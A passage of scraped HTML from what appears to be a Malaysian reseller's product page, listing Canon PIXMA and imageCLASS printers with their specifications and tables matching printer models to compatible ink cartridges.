srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><p>Â </p><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E4270</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E470</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E477</td><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E480</td><td>CL-57 (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E510</td><td>CL-98 (Colour)</td></tr><tr><td>PG-88 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G2010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G4010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP100</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA iP1300</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr></tbody></table><p>Â </p><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA iP4200</td><td>CLI-8 (Black)</td></tr><tr><td>CLI-8 (Cyan)</td></tr><tr><td>CLI-8 (Magenta)</td></tr><tr><td>CLI-8 (Yellow)</td></tr><tr><td>PGI-5 (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA iP7270</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td rowspan=\"12\" align=\"center\">PIXMA iP8770</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td rowspan=\"11\" align=\"center\">PIXMA iX6770</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td>PGI-755XXL (Pigment Black)</td></tr><tr><td rowspan=\"11\" align=\"center\">PIXMA iX6870</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td>PGI-755XXL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>CL-746XL (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr><tr><td>PG-745XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>CL-746XL (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr><tr><td>PG-745XL (Pigment Black)</td></tr></tbody></table>  <table width=\"378\" border=\"1\" cellpadding=\"10\">\n    <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3570</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3670</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA MG7570</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP160</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP170</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 